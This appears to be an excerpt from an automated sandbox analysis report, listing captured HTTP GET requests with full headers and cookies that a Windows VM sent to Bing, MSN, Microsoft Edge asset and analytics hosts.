ak_bmsc=A88CDCB57762C2831119E8D19390832D~000000000000000000000000000000~YAAQFthUuAcZ0i+XAQAALpzqRhwwv8dujg5AfSbMiYGu/1ZsIZ4Sjvz59ZCkaYjouGk3AKmkBsJw3nJzEaWbGZthLzpJX2+IRoIG6FzSq1cPK5ICfT6HzNAmdQbK/vFAdR1YHvUOm0LBH1jgvYVkqecPdpQ6Kwc+ZLW7D+t/NUlrxUx0Z5O8k7S/Vrisiu6NEzpwwnTEG7gunBDJZyI1Wqbfg0hL4J34Uv76z24fC8x9zWRukEZQYs0TJXhI/UHDY2edd86ZLYcXsbmij6mSrXv7uqH6dGH+KVse0ALE74ijMXCycVrRQ9Wve6c3JgV0atfbVKkOHuKgYbEaOChW4gAKXMIR8k4wKZzQQzhSqWF9d6CR5J0yy3AdKLL+q6Hg69reZU7lVQ==; MUIDB=4590362BB5CF472B95BBEDB3112D4B7B
          Source: global trafficHTTP traffic detected: GET /rp/tBpXlF3sjMQG5dYd3N9wm6DnoIE.js HTTP/1.1host: www.bing.comaccept: */*referer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Initaccept-encoding: identityuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045cookie: MUID=4590362BB5CF472B95BBEDB3112D4B7B; _SS=SID=19FF0D34A8246FAD33EA189CA9E56EAD&CBV=54277149&CPID=1741339336683&AC=1&CPH=01beaa36; _EDGE_S=SID=128F177EAEC96EC83CF802D6AFDF6F95&mkt=de-ch; SRCHUID=V=2&GUID=79A4A21CD5314D11975C5022FA7E18FB&dmnchg=1; SRCHD=AF=NOFORM; SRCHUSR=DOB=20250307&DS=1; SRCHHPGUSR=IPMH=68baa303&IPMID=1741339336683&SRCHLANG=de&LUT=1741339335365; CortanaAppUID=99325A50A46066F842A6B684698F464A; TOptOut=1; ak_bmsc=A88CDCB57762C2831119E8D19390832D~000000000000000000000000000000~YAAQFthUuAcZ0i+XAQAALpzqRhwwv8dujg5AfSbMiYGu/1ZsIZ4Sjvz59ZCkaYjouGk3AKmkBsJw3nJzEaWbGZthLzpJX2+IRoIG6FzSq1cPK5ICfT6HzNAmdQbK/vFAdR1YHvUOm0LBH1jgvYVkqecPdpQ6Kwc+ZLW7D+t/NUlrxUx0Z5O8k7S/Vrisiu6NEzpwwnTEG7gunBDJZyI1Wqbfg0hL4J34Uv76z24fC8x9zWRukEZQYs0TJXhI/UHDY2edd86ZLYcXsbmij6mSrXv7uqH6dGH+KVse0ALE74ijMXCycVrRQ9Wve6c3JgV0atfbVKkOHuKgYbEaOChW4gAKXMIR8k4wKZzQQzhSqWF9d6CR5J0yy3AdKLL+q6Hg69reZU7lVQ==; MUIDB=4590362BB5CF472B95BBEDB3112D4B7B
          Source: global trafficHTTP traffic detected: GET /statics/icons/favicon_newtabpage.png HTTP/1.1host: assets.msn.comsec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8sec-fetch-site: same-sitesec-fetch-mode: no-corssec-fetch-dest: imagereferer: https://ntp.msn.com/accept-encoding: identityaccept-language: en-GB,en;q=0.9,en-US;q=0.8cookie: _C_ETH=1cookie: USRLOC=cookie: MUID=2F1941F5ECC860FA30CE57F6ED396174cookie: _EDGE_S=F=1&SID=2EE4CF8EE2BC609B2948D98DE37C610Dcookie: _EDGE_V=1
          Source: global trafficHTTP traffic detected: GET /entityextractiontemplates/api/v1/assets/find-assets?name=edge_hub_apps_manifest_gz&version=4.7.*&channel=stable&key=d414dd4f9db345fa8003e32adc81b362 HTTP/1.1host: edge.microsoft.comedge-asset-group: Shorelinesec-fetch-site: nonesec-fetch-mode: no-corssec-fetch-dest: emptyuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47accept-encoding: identityaccept-language: en-GB,en;q=0.9,en-US;q=0.8
          Source: global trafficHTTP traffic detected: GET /entityextractiontemplates/api/v1/assets/find-assets?name=arbitration_priority_list&version=4.*.*&channel=stable&key=d414dd4f9db345fa8003e32adc81b362 HTTP/1.1host: edge.microsoft.comedge-asset-group: ArbitrationServicesec-fetch-site: nonesec-fetch-mode: no-corssec-fetch-dest: emptyuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47accept-encoding: identityaccept-language: en-GB,en;q=0.9,en-US;q=0.8
          Source: global trafficHTTP traffic detected: GET /resolver/api/resolve/v3/config/?expType=AppConfig&expInstance=default&apptype=edgeChromium&v=20250605.317&targetScope={%22audienceMode%22:%22adult%22,%22browser%22:{%22browserType%22:%22edgeChromium%22,%22version%22:%22117%22,%22ismobile%22:%22false%22},%22deviceFormFactor%22:%22desktop%22,%22domain%22:%22ntp.msn.com%22,%22locale%22:{%22content%22:{%22language%22:%22en%22,%22market%22:%22us%22},%22display%22:{%22language%22:%22en%22,%22market%22:%22us%22}},%22os%22:%22windows%22,%22modes%22:{%22audienceMode%22:%22adult%22},%22platform%22:%22web%22,%22pageType%22:%22dhp%22,%22pageExperiments%22:[%22prg-ad-infopane-dv%22]} HTTP/1.1host: assets.msn.comsec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"accept: */*origin: https://ntp.msn.comsec-fetch-site: same-sitesec-fetch-mode: corssec-fetch-dest: emptyreferer: https://ntp.msn.com/accept-encoding: identityaccept-language: en-GB,en;q=0.9,en-US;q=0.8
          Source: global trafficHTTP traffic detected: GET /entityextractiontemplates/api/v1/assets/find-assets?name=domains_config_gz&version=2.*.*&channel=stable&key=d414dd4f9db345fa8003e32adc81b362 HTTP/1.1host: edge.microsoft.comedge-asset-group: EntityExtractionDomainsConfigsec-mesh-client-edge-version: 117.0.2045.47sec-mesh-client-edge-channel: stablesec-mesh-client-os: Windowssec-mesh-client-os-version: 10.0.19045sec-mesh-client-arch: x86_64sec-mesh-client-webview: 0sec-fetch-site: nonesec-fetch-mode: no-corssec-fetch-dest: emptyuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47accept-encoding: identityaccept-language: en-GB,en;q=0.9,en-US;q=0.8
          Source: global trafficHTTP traffic detected: GET /apc/trans.gif?fd97ed5ac3ed5f1c695e2e77a88f5ff4 HTTP/1.1host: 3e8c2c37b90301f8e8025e3b8e4361cf.clo.footprintdns.comorigin: https://www.bing.comreferer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Initaccept: */*accept-language: en-CHaccept-encoding: identityuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045
          Source: global trafficHTTP traffic detected: GET /rp/tIcSGdw0KKZBXl-9dyaGHmf0tCY.js HTTP/1.1host: www.bing.comaccept: */*referer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Initaccept-encoding: identityuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045cookie: MUID=4590362BB5CF472B95BBEDB3112D4B7B; _SS=SID=19FF0D34A8246FAD33EA189CA9E56EAD&CBV=54277149&CPID=1741339336683&AC=1&CPH=01beaa36; _EDGE_S=SID=128F177EAEC96EC83CF802D6AFDF6F95&mkt=de-ch; SRCHUID=V=2&GUID=79A4A21CD5314D11975C5022FA7E18FB&dmnchg=1; SRCHD=AF=NOFORM; SRCHUSR=DOB=20250307&DS=1; SRCHHPGUSR=IPMH=68baa303&IPMID=1741339336683&SRCHLANG=de&LUT=1741339335365; CortanaAppUID=99325A50A46066F842A6B684698F464A; TOptOut=1; ak_bmsc=A88CDCB57762C2831119E8D19390832D~000000000000000000000000000000~YAAQFthUuAcZ0i+XAQAALpzqRhwwv8dujg5AfSbMiYGu/1ZsIZ4Sjvz59ZCkaYjouGk3AKmkBsJw3nJzEaWbGZthLzpJX2+IRoIG6FzSq1cPK5ICfT6HzNAmdQbK/vFAdR1YHvUOm0LBH1jgvYVkqecPdpQ6Kwc+ZLW7D+t/NUlrxUx0Z5O8k7S/Vrisiu6NEzpwwnTEG7gunBDJZyI1Wqbfg0hL4J34Uv76z24fC8x9zWRukEZQYs0TJXhI/UHDY2edd86ZLYcXsbmij6mSrXv7uqH6dGH+KVse0ALE74ijMXCycVrRQ9Wve6c3JgV0atfbVKkOHuKgYbEaOChW4gAKXMIR8k4wKZzQQzhSqWF9d6CR5J0yy3AdKLL+q6Hg69reZU7lVQ==; MUIDB=4590362BB5CF472B95BBEDB3112D4B7B
          Source: global trafficHTTP traffic detected: GET /c.gif?rnd=1749241513402&udc=true&pg.n=default&pg.t=dhp&pg.c=547&pg.p=anaheim&rf=&tp=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2520tab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp&cvs=Browser&di=340&st.dpt=&st.sdpt=antp&subcvs=homepage&lng=en-us&rid=a7e433960b464a5ab7e1df75825f0b16&activityId=a7e433960b464a5ab7e1df75825f0b16&d.imd=false&scr=1280x1024&anoncknm=app_anon&issso=&aadState=0 HTTP/1.1host: c.msn.comsec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8sec-fetch-site: same-sitesec-fetch-mode: no-corssec-fetch-dest: imagereferer: https://ntp.msn.com/accept-encoding: identityaccept-language: en-GB,en;q=0.9,en-US;q=0.8cookie: _C_ETH=1cookie: USRLOC=cookie: MUID=2F1941F5ECC860FA30CE57F6ED396174cookie: _EDGE_S=F=1&SID=2EE4CF8EE2BC609B2948D98DE37C610Dcookie: _EDGE_V=1
          Source: global trafficHTTP traffic detected: GET /b?rn=1749241513403&c1=2&c2=3000001&cs_ucfr=1&c7=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2Btab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp%26mkt%3Den-us&c8=New+tab&c9=&cs_fpid=2F1941F5ECC860FA30CE57F6ED396174&cs_fpit=o&cs_fpdm=*null&cs_fpdt=*null HTTP/1.1host: sb.scorecardresearch.comsec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8sec-fetch-site: cross-sitesec-fetch-mode: no-corssec-fetch-dest: imagereferer: https://ntp.msn.com/accept-encoding: identityaccept-language: en-GB,en;q=0.9,en-US;q=0.8
          Source: global trafficHTTP traffic detected: GET /apc/trans.gif?75dfbb5b71c763c6d03afe99f880d7c1 HTTP/1.1host: 3e8c2c37b90301f8e8025e3b8e4361cf.clo.footprintdns.comorigin: https://www.bing.comreferer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Initaccept: */*accept-language: en-CHaccept-encoding: identityuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045
          Source: global trafficHTTP traffic detected: GET /rp/wfEXc3aEPq6rcYq0ZJTmJluzF0M.js HTTP/1.1host: www.bing.comaccept: */*referer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Initaccept-encoding: identityuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045cookie: MUID=4590362BB5CF472B95BBEDB3112D4B7B; _SS=SID=19FF0D34A8246FAD33EA189CA9E56EAD&CBV=54277149&CPID=1741339336683&AC=1&CPH=01beaa36; _EDGE_S=SID=128F177EAEC96EC83CF802D6AFDF6F95&mkt=de-ch; SRCHUID=V=2&GUID=79A4A21CD5314D11975C5022FA7E18FB&dmnchg=1; SRCHD=AF=NOFORM; SRCHUSR=DOB=20250307&DS=1; SRCHHPGUSR=IPMH=68baa303&IPMID=1741339336683&SRCHLANG=de&LUT=1741339335365; CortanaAppUID=99325A50A46066F842A6B684698F464A; TOptOut=1; ak_bmsc=A88CDCB57762C2831119E8D19390832D~000000000000000000000000000000~YAAQFthUuAcZ0i+XAQAALpzqRhwwv8dujg5AfSbMiYGu/1ZsIZ4Sjvz59ZCkaYjouGk3AKmkBsJw3nJzEaWbGZthLzpJX2+IRoIG6FzSq1cPK5ICfT6HzNAmdQbK/vFAdR1YHvUOm0LBH1jgvYVkqecPdpQ6Kwc+ZLW7D+t/NUlrxUx0Z5O8k7S/Vrisiu6NEzpwwnTEG7gunBDJZyI1Wqbfg0hL4J34Uv76z24fC8x9zWRukEZQYs0TJXhI/UHDY2edd86ZLYcXsbmij6mSrXv7uqH6dGH+KVse0ALE74ijMXCycVrRQ9Wve6c3JgV0atfbVKkOHuKgYbEaOChW4gAKXMIR8k4wKZzQQzhSqWF9d6CR5J0yy3AdKLL+q6Hg69reZU7lVQ==; MUIDB=4590362BB5CF472B95BBEDB3112D4B7B
          Source: global trafficHTTP traffic detected: GET /b2?rn=1749241513403&c1=2&c2=3000001&cs_ucfr=1&c7=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2Btab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp%26mkt%3Den-us&c8=New+tab&c9=&cs_fpid=2F1941F5ECC860FA30CE57F6ED396174&cs_fpit=o&cs_fpdm=*null&cs_fpdt=*null HTTP/1.1host: sb.scorecardresearch.comsec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8sec-fetch-site: cross-sitesec-fetch-mode: no-corssec-fetch-dest: imagereferer: https://ntp.msn.com/accept-encoding: identityaccept-language: en-GB,en;q=0.9,en-US;q=0.8cookie: UID=106e87e1540131f81018ce41749241514cookie: XID=106e87e1540131f81018ce41749241514
          Source: global trafficHTTP traffic detected: GET /c.gif?rnd=1749241513402&udc=true&pg.n=default&pg.t=dhp&pg.c=547&pg.p=anaheim&rf=&tp=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2520tab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp&cvs=Browser&di=340&st.dpt=&st.sdpt=antp&subcvs=homepage&lng=en-us&rid=a7e433960b464a5ab7e1df75825f0b16&activityId=a7e433960b464a5ab7e1df75825f0b16&d.imd=false&scr=1280x1024&anoncknm=app_anon&issso=&aadState=0&ctsa=mr&CtsSyncId=DC002336B89348B09776FD857DC911EC&RedC=c.msn.com&MXFR=2F1941F5ECC860FA30CE57F6ED396174 HTTP/1.1host: c.bing.comsec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8sec-fetch-site: cross-sitesec-fetch-mode: no-corssec-fetch-dest: imagesec-ms-gec: A53560149621CDF558F0573A619C509EE4BCFCB16B4E08AF2A31747944177387sec-ms-gec-version: 1-117.0.2045.47referer: https://ntp.msn.com/accept-encoding: identityaccept-language: en-GB,en;q=0.9,en-US;q=0.8
          Source: global trafficHTTP traffic detected: GET /c.gif?rnd=1749241513402&udc=true&pg.n=default&pg.t=dhp&pg.c=547&pg.p=anaheim&rf=&tp=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2520tab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp&cvs=Browser&di=340&st.dpt=&st.sdpt=antp&subcvs=homepage&lng=en-us&rid=a7e433960b464a5ab7e1df75825f0b16&activityId=a7e433960b464a5ab7e1df75825f0b16&d.imd=false&scr=1280x1024&anoncknm=app_anon&issso=&aadState=0&ctsa=mr&CtsSyncId=DC002336B89348B09776FD857DC911EC&MUID=2F1941F5ECC860FA30CE57F6ED396174 HTTP/1.1host: c.msn.comsec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8sec-fetch-site: cross-sitesec-fetch-mode: no-corssec-fetch-dest: imagereferer: https://ntp.msn.com/accept-encoding: identityaccept-language: en-GB,en;q=0.9,en-US;q=0.8cookie: USRLOC=cookie: MUID=2F1941F5ECC860FA30CE57F6ED396174cookie: _EDGE_S=F=1&SID=2EE4CF8EE2BC609B2948D98DE37C610Dcookie: _EDGE_V=1cookie: SM=T
          Source: global trafficHTTP traffic detected: GET /rp/x_3qvwDia52Yk8BT-lka6wZS3R4.js HTTP/1.1host: www.bing.comaccept: */*referer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Initaccept-encoding: identityuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045cookie: MUID=4590362BB5CF472B95BBEDB3112D4B7B; _SS=SID=19FF0D34A8246FAD33EA189CA9E56EAD&CBV=54277149&CPID=1741339336683&AC=1&CPH=01beaa36; _EDGE_S=SID=128F177EAEC96EC83CF802D6AFDF6F95&mkt=de-ch; SRCHUID=V=2&GUID=79A4A21CD5314D11975C5022FA7E18FB&dmnchg=1; SRCHD=AF=NOFORM; SRCHUSR=DOB=20250307&DS=1; SRCHHPGUSR=IPMH=68baa303&IPMID=1741339336683&SRCHLANG=de&LUT=1741339335365; CortanaAppUID=99325A50A46066F842A6B684698F464A; TOptOut=1; ak_bmsc=A88CDCB57762C2831119E8D19390832D~000000000000000000000000000000~YAAQFthUuAcZ0i+XAQAALpzqRhwwv8dujg5AfSbMiYGu/1ZsIZ4Sjvz59ZCkaYjouGk3AKmkBsJw3nJzEaWbGZthLzpJX2+IRoIG6FzSq1cPK5ICfT6HzNAmdQbK/vFAdR1YHvUOm0LBH1jgvYVkqecPdpQ6Kwc+ZLW7D+t/NUlrxUx0Z5O8k7S/Vrisiu6NEzpwwnTEG7gunBDJZyI1Wqbfg0hL4J34Uv76z24fC8x9zWRukEZQYs0TJXhI/UHDY2edd86ZLYcXsbmij6mSrXv7uqH6dGH+KVse0ALE74ijMXCycVrRQ9Wve6c3JgV0atfbVKkOHuKgYbEaOChW4gAKXMIR8k4wKZzQQzhSqWF9d6CR5J0yy3AdKLL+q6Hg69reZU7lVQ==; MUIDB=4590362BB5CF472B95BBEDB3112D4B7B
          Source: global trafficHTTP traffic detected: GET /abusiveadblocking/api/v1/blocklist HTTP/1.1host: edge.microsoft.comif-none-match: "9E0A5915E51EE1E95D843B1CDAB336B8361C98398784A73FC6A8A28F910D2E75"sec-mesh-client-edge-version: 117.0.2045.47sec-mesh-client-edge-channel: stablesec-mesh-client-os: Windowssec-mesh-client-os-version: 10.0.19045sec-mesh-client-arch: x86_64sec-mesh-client-webview: 0sec-fetch-site: nonesec-fetch-mode: no-corssec-fetch-dest: emptyuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47accept-encoding: identity
          Source: global trafficHTTP traffic detected: GET /rp/zndPBVydyQ6eRKaiC_BVZLXnAIU.js HTTP/1.1host: www.bing.comaccept: */*referer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Initaccept-encoding: identityuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045cookie: MUID=4590362BB5CF472B95BBEDB3112D4B7B; _SS=SID=19FF0D34A8246FAD33EA189CA9E56EAD&CBV=54277149&CPID=1741339336683&AC=1&CPH=01beaa36; _EDGE_S=SID=128F177EAEC96EC83CF802D6AFDF6F95&mkt=de-ch; SRCHUID=V=2&GUID=79A4A21CD5314D11975C5022FA7E18FB&dmnchg=1; SRCHD=AF=NOFORM; SRCHUSR=DOB=20250307&DS=1; SRCHHPGUSR=IPMH=68baa303&IPMID=1741339336683&SRCHLANG=de&LUT=1741339335365; CortanaAppUID=99325A50A46066F842A6B684698F464A; TOptOut=1; ak_bmsc=A88CDCB57762C2831119E8D19390832D~000000000000000000000000000000~YAAQFthUuAcZ0i+XAQAALpzqRhwwv8dujg5AfSbMiYGu/1ZsIZ4Sjvz59ZCkaYjouGk3AKmkBsJw3nJzEaWbGZthLzpJX2+IRoIG6FzSq1cPK5ICfT6HzNAmdQbK/vFAdR1YHvUOm0LBH1jgvYVkqecPdpQ6Kwc+ZLW7D+t/NUlrxUx0Z5O8k7S/Vrisiu6NEzpwwnTEG7gunBDJZyI1Wqbfg0hL4J34Uv76z24fC8x9zWRukEZQYs0TJXhI/UHDY2edd86ZLYcXsbmij6mSrXv7uqH6dGH+KVse0ALE74ijMXCycVrRQ9Wve6c3JgV0atfbVKkOHuKgYbEaOChW4gAKXMIR8k4wKZzQQzhSqWF9d6CR5J0yy3AdKLL+q6Hg69reZU7lVQ==; MUIDB=4590362BB5CF472B95BBEDB3112D4B7B
          Source: global trafficHTTP traffic detected: GET /assets/domains_config_gz/2.8.76/asset?assetgroup=EntityExtractionDomainsConfig HTTP/1.1host: edgeassetservice.azureedge.netedge-asset-group: EntityExtractionDomainsConfigsec-mesh-client-edge-version: 117.0.2045.47sec-mesh-client-edge-channel: stablesec-mesh-client-os: Windowssec-mesh-client-os-version: 10.0.19045sec-mesh-client-arch: x86_64sec-mesh-client-webview: 0sec-fetch-site: nonesec-fetch-mode: no-corssec-fetch-dest: emptyuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47accept-encoding: identityaccept-language: en-GB,en;q=0.9,en-US;q=0.8
          Source: global trafficHTTP traffic detected: GET /assets/edge_hub_apps_manifest_gz/4.7.107/asset?assetgroup=Shoreline HTTP/1.1host: edgeassetservice.azureedge.netedge-asset-group: Shorelinesec-fetch-site: nonesec-fetch-mode: no-corssec-fetch-dest: emptyuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47accept-encoding: identityaccept-language: en-GB,en;q=0.9,en-US;q=0.8
          Source: global trafficHTTP traffic detected: GET /assets/edge_hub_apps_action_center_maximal_light.png/1.2.1/asset HTTP/1.1host: edgeassetservice.azureedge.netsec-fetch-site: nonesec-fetch-mode: no-corssec-fetch-dest: emptyuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47accept-encoding: identityaccept-language: en-GB,en;q=0.9,en-US;q=0.8
          Source: global trafficHTTP traffic detected: GET /assets/edge_hub_apps_shopping_maximal_light.png/1.4.0/asset HTTP/1.1host: edgeassetservice.azureedge.netsec-fetch-site: nonesec-fetch-mode: no-corssec-fetch-dest: emptyuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47accept-encoding: identityaccept-language: en-GB,en;q=0.9,en-US;q=0.8
          Source: global trafficHTTP traffic detected: GET /assets/edge_hub_apps_toolbox_maximal_light.png/1.5.13/asset HTTP/1.1host: edgeassetservice.azureedge.netsec-fetch-site: nonesec-fetch-mode: no-corssec-fetch-dest: emptyuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47accept-encoding: identityaccept-language: en-GB,en;q=0.9,en-US;q=0.8
          Source: global trafficHTTP traffic detected: GET /assets/edge_hub_apps_games_maximal_light.png/1.7.1/asset HTTP/1.1host: edgeassetservice.azureedge.netsec-fetch-site: nonesec-fetch-mode: no-corssec-fetch-dest: emptyuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47accept-encoding: identityaccept-language: en-GB,en;q=0.9,en-US;q=0.8
          Source: global trafficHTTP traffic detected: GET /assets/edge_hub_apps_edrop_maximal_light.png/1.1.12/asset HTTP/1.1host: edgeassetservice.azureedge.netsec-fetch-site: nonesec-fetch-mode: no-corssec-fetch-dest: emptyuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47accept-encoding: identityaccept-language: en-GB,en;q=0.9,en-US;q=0.8
          Source: global trafficHTTP traffic detected: GET /assets/edge_hub_apps_M365_light.png/1.7.32/asset HTTP/1.1host: edgeassetservice.azureedge.netsec-fetch-site: nonesec-fetch-mode: no-corssec-fetch-dest: emptyuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47accept-encoding: identityaccept-language: en-GB,en;q=0.9,en-US;q=0.8
          Source: global trafficHTTP traffic detected: GET /assets/edge_hub_apps_search_maximal_light.png/1.3.6/asset HTTP/1.1host: edgeassetservice.azureedge.netsec-fetch-site: nonesec-fetch-mode: no-corssec-fetch-dest: emptyuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47accept-encoding: identityaccept-language: en-GB,en;q=0.9,en-US;q=0.8
          Source: global trafficHTTP traffic detected: GET /assets/edge_hub_apps_outlook_light.png/1.9.10/asset HTTP/1.1host: edgeassetservice.azureedge.netsec-fetch-site: nonesec-fetch-mode: no-corssec-fetch-dest: emptyuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47accept-encoding: identityaccept-language: en-GB,en;q=0.9,en-US;q=0.8
